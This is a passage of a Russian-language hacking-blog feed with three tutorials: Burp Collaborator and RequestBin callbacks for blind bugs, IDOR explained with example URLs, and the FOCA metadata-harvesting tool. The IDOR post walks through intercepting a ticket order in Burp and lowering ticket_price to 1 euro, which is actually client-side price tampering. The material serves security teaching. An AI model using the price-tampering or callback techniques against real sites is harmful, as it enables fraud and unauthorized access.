  &lt;p id=&quot;NTlT&quot;&gt;Есть еще одна полезная штука, это - burp collaborator. Если рассматривать, то burp collaborator - это утилита, какая показывает, послал ли запрос сервер, или нет. Необходима когда на сайте тип уязвимости blind. Можем использовать request bin.  &lt;a href=&quot;http://requestbin.net/&quot; target=&quot;_blank&quot;&gt;http://requestbin.net/&lt;/a&gt; просо создаем новый requestbin и посылаем запрос командой &lt;/p&gt;
  &lt;p id=&quot;mchD&quot;&gt;&lt;em&gt;curl -X POST -d &amp;quot;fizz=buzz&amp;quot; &lt;a href=&quot;http://requestbin.net/r/&quot; target=&quot;_blank&quot;&gt;http://requestbin.net/r/&amp;lt;&lt;/a&gt;тутваше&amp;gt;&lt;/em&gt;&lt;/p&gt;
  &lt;figure id=&quot;qpeB&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/48/15/4815e3ec-ffb4-4938-855c-26cf61bab4f1.png&quot; width=&quot;1722&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zu6E&quot;&gt;Если понравилась эта статья, пишите в комментариях. Могу потом написать про бурп еще что-то подобное. Всем хороших хаков!&lt;/p&gt;

</content></entry><entry><id>rytnux:cwUkKdtjKOW</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/cwUkKdtjKOW?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Idor на пальцах</title><published>2022-03-10T14:45:13.722Z</published><updated>2022-03-10T14:45:13.722Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/6b/d9/6bd95265-c795-4237-9582-3f8ba7e0d9ab.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/e4/2e/e42eabcf-e063-40e9-b41c-b632e8dc3e17.png&quot;&gt;Согласно определению OWASP, «небезопасные прямые ссылки на объекты возникают, когда приложение предоставляет прямой доступ к объектам на основе введенных пользователем данных. В результате этой уязвимости злоумышленники могут обойти авторизацию и получить прямой доступ к ресурсам в системе, например к записям базы данных или файлам» 1</summary><content type="html">
  &lt;figure id=&quot;E8uz&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/2e/e42eabcf-e063-40e9-b41c-b632e8dc3e17.png&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;section style=&quot;background-color:hsl(hsl(24,  24%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;QkYb&quot;&gt;НАШ КАНАЛ =&amp;gt; https://t.me/termuxqew&lt;/h3&gt;
  &lt;/section&gt;
  &lt;p id=&quot;U0si&quot;&gt;Согласно определению OWASP, «небезопасные прямые ссылки на объекты возникают, когда приложение предоставляет прямой доступ к объектам на основе введенных пользователем данных. В результате этой уязвимости злоумышленники могут обойти авторизацию и получить прямой доступ к ресурсам в системе, например к записям базы данных или файлам» &lt;a href=&quot;https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)&quot; target=&quot;_blank&quot;&gt;1&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;E657&quot;&gt;Уязвимости IDOR (Insecure Direct Object references)  - связанные с авторизацией, которые обычно приводят к раскрытию и потере конфиденциальной информации, если она существует в системе. Атака IDOR — одна из самых простых для объяснения. &lt;/p&gt;
  &lt;h2 id=&quot;0Fri&quot;&gt;Пример:&lt;/h2&gt;
  &lt;p id=&quot;SIYW&quot;&gt;Давайте рассмотрим следующий URL-адрес: &lt;a href=&quot;http://idorexample.com/profile?userID=100&quot; target=&quot;_blank&quot;&gt;http://idorexample.com/profile?userID=100&lt;/a&gt; , который возвращает&lt;/p&gt;
  &lt;p id=&quot;8Fza&quot;&gt;Student Name: Liisa&lt;br /&gt;Student Email: liisa@email.com&lt;br /&gt;CGPA: 4.2&lt;br /&gt;Address: Abcdef, 123&lt;br /&gt;&lt;br /&gt;А теперь представьте, просто изменив идентификатор пользователя на 101: &lt;a href=&quot;http://idorexample.com/profile?userID=101&quot; target=&quot;_blank&quot;&gt;http://idorexample.com/profile?userID=101&lt;/a&gt; &lt;/p&gt;
  &lt;pre id=&quot;NCW3&quot;&gt;Student Name: Artur
Student Email: artur@email.com
CGPA: 4.7
Address: Abcdef, 123&lt;/pre&gt;
  &lt;p id=&quot;LmHq&quot;&gt;Если система отображает результат без надлежащей проверки авторизации, то это небезопасные прямые ссылки на объекты. Это самый простой пример. Это наиболее распространенная уязвимость, которую обычно упускают из виду, поскольку шаблон параметра отличается от веб-приложения к веб-приложению. С другой стороны, автоматические инструменты сканирования недостаточно умны, чтобы найти эту уязвимость. Это связано с тем, что проверки безопасности недостаточно интеллектуальны, чтобы знать, являюсь ли я законным пользователем или нет, пока я не использую вредоносную полезную нагрузку.&lt;/p&gt;
  &lt;h3 id=&quot;JcMp&quot;&gt;Влияние IDOR&lt;/h3&gt;
  &lt;p id=&quot;DIJL&quot;&gt;Последствия IDOR не ограничиваются потерей конфиденциальной информации. Посмотрите на следующее условие.&lt;/p&gt;
  &lt;pre id=&quot;2pIo&quot;&gt;http://idor.example.com/changePassword?userID=100&lt;/pre&gt;
  &lt;pre id=&quot;ybf0&quot;&gt;http://idor.example.com/deleteAccount?userID=101&lt;/pre&gt;
  &lt;p id=&quot;rxNu&quot;&gt;На этот раз мы можем представить, что уязвимость IDOR также приводит к потере данных и захвату учетной записи.&lt;/p&gt;
  &lt;h1 id=&quot;JFHU&quot;&gt;Где существует IDOR&lt;/h1&gt;
  &lt;p id=&quot;3IWQ&quot;&gt;IDOR существует во многих местах, однако наиболее распространенными являются следующие:&lt;br /&gt;1. GET-запрос&lt;br /&gt;2. Страница входа&lt;br /&gt;3. POST-запрос&lt;br /&gt;4. Изменить пароль&lt;br /&gt;5. API-запрос&lt;/p&gt;
  &lt;h2 id=&quot;e1y8&quot;&gt;IDOR на практике&lt;/h2&gt;
  &lt;p id=&quot;OGCt&quot;&gt;У нас есть веб страница, на какой можем купить билеты.&lt;/p&gt;
  &lt;figure id=&quot;iVu8&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3d/a3/3da30607-69ce-4df3-9fc6-d01571dc8c8b.png&quot; width=&quot;736&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ol2G&quot;&gt;Цена одного билета составляет 15 Евро. Что-то дорого, давайте используем уязвимость idor и закажем 1 билет за 1 евро:&lt;/p&gt;
  &lt;ol id=&quot;ORDN&quot;&gt;
    &lt;li id=&quot;Qawp&quot;&gt;Перехватываем запрос через Burp:&lt;/li&gt;
  &lt;/ol&gt;
  &lt;figure id=&quot;7dd1&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/92/52/92529a62-7fd8-4b3c-bc94-90d972c79bce.png&quot; width=&quot;891&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;LXfO&quot;&gt; 2. Меняем значение ticket_price на цену (в моем случае 1) и отправляем запрос:&lt;/p&gt;
  &lt;figure id=&quot;d3RX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4a/0b/4a0b2dbc-8b42-46f1-bc8a-afa1edbb2b07.png&quot; width=&quot;756&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bFLs&quot;&gt; 3. Наслаждаемся  ценой в 1 Евро :)&lt;/p&gt;
  &lt;figure id=&quot;ToRu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f5/ca/f5ca10e0-1208-40a3-9e83-5adad6b7c936.png&quot; width=&quot;697&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nsyV&quot;&gt;&lt;strong&gt;Это был самый простой пример, на деле все будет сложнее&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;TPoq&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;09Cv&quot;&gt;Дополнительные сведения см. на следующих страницах &lt;a href=&quot;https://www.gracefulsecurity.com/idor-insecure-direct-object-reference/&quot; target=&quot;_blank&quot;&gt;https://www.gracefulsecurity.com/idor-insecure-direct-object-reference/&lt;/a&gt; &lt;a href=&quot;https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_&quot; target=&quot;_blank&quot;&gt;https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_&lt;/a&gt;(OTG-AUTHZ-004)&lt;/p&gt;

</content></entry><entry><id>rytnux:Iu4v9TCSAjk</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/Iu4v9TCSAjk?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Foca - лучший инструмент для пассивного фаззинга</title><published>2022-03-04T11:47:22.280Z</published><updated>2022-03-04T11:47:22.280Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/b3/f3/b3f35873-ceba-4e0a-8a33-b7b35e5f789c.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://miro.medium.com/max/728/1*rwInz0NfhClZKN6MVDWh2w.png&quot;&gt;FOCA — это инструмент, используемый главным образом для поиска метаданных и скрытой информации в сканируемых документах . Эти документы могут быть размещены на веб-страницах и могут быть загружены и проанализированы с помощью FOCA.</summary><content type="html">
  &lt;figure id=&quot;IFZ9&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://miro.medium.com/max/728/1*rwInz0NfhClZKN6MVDWh2w.png&quot; width=&quot;728&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dGZX&quot;&gt;&lt;strong&gt;FOCA — это инструмент, используемый главным образом для поиска метаданных и скрытой информации в сканируемых документах&lt;/strong&gt; . Эти документы могут быть размещены на веб-страницах и могут быть загружены и проанализированы с помощью FOCA.&lt;/p&gt;
  &lt;p id=&quot;Tb9J&quot;&gt;Он способен анализировать широкий спектр документов, наиболее распространенными из которых являются файлы &lt;strong&gt;Microsoft Office&lt;/strong&gt; , &lt;strong&gt;Open Office&lt;/strong&gt; или &lt;strong&gt;PDF&lt;/strong&gt; , хотя он также анализирует, например, файлы Adobe InDesign или SVG.&lt;/p&gt;
  &lt;p id=&quot;ynp9&quot;&gt;Эти документы ищутся с использованием трех возможных поисковых систем: &lt;strong&gt;Google&lt;/strong&gt; , &lt;strong&gt;Bing&lt;/strong&gt; и &lt;strong&gt;DuckDuckGo&lt;/strong&gt; . Сумма результатов трех двигателей составляет множество документов. Также можно добавить локальные файлы для извлечения информации EXIF ​​из графических файлов, а полный анализ информации, обнаруженной через URL, проводится еще до загрузки файла.&lt;/p&gt;
  &lt;p id=&quot;TTjx&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;S1jL&quot;&gt;Проще говоря мы можем собрать документы и их метданные из заданного нами сайта.&lt;/p&gt;
  &lt;figure id=&quot;wqml&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5c/e5/5ce5c051-0ace-4f5f-ac7b-c369a97007ed.png&quot; width=&quot;1919&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QZ4B&quot;&gt;Главный плюс программы заключаеться в том, что она может собирать метаданные из собраных документов. &lt;/p&gt;
  &lt;figure id=&quot;07mt&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/23/47/2347acdb-88fe-4553-9cbb-4e09ad94681b.png&quot; width=&quot;1455&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;h3as&quot;&gt;Более подробный мануал =&amp;gt; &lt;a href=&quot;https://www.hackers-arise.com/post/2016/09/08/using-foca-to-gather-website-metadata&quot; target=&quot;_blank&quot;&gt;CLICK&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;K4wS&quot;&gt;Наш телеграм канал =&amp;gt; &lt;a href=&quot;https://t.me/termuxqew&quot; target=&quot;_blank&quot;&gt;CLICK&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;O7FI&quot;&gt;Ссылка на Foca =&amp;gt; &lt;a href=&quot;https://github.com/ElevenPaths/FOCA/releases&quot; target=&quot;_blank&quot;&gt;Click &lt;/a&gt;&lt;/p&gt;

</content></entry></feed>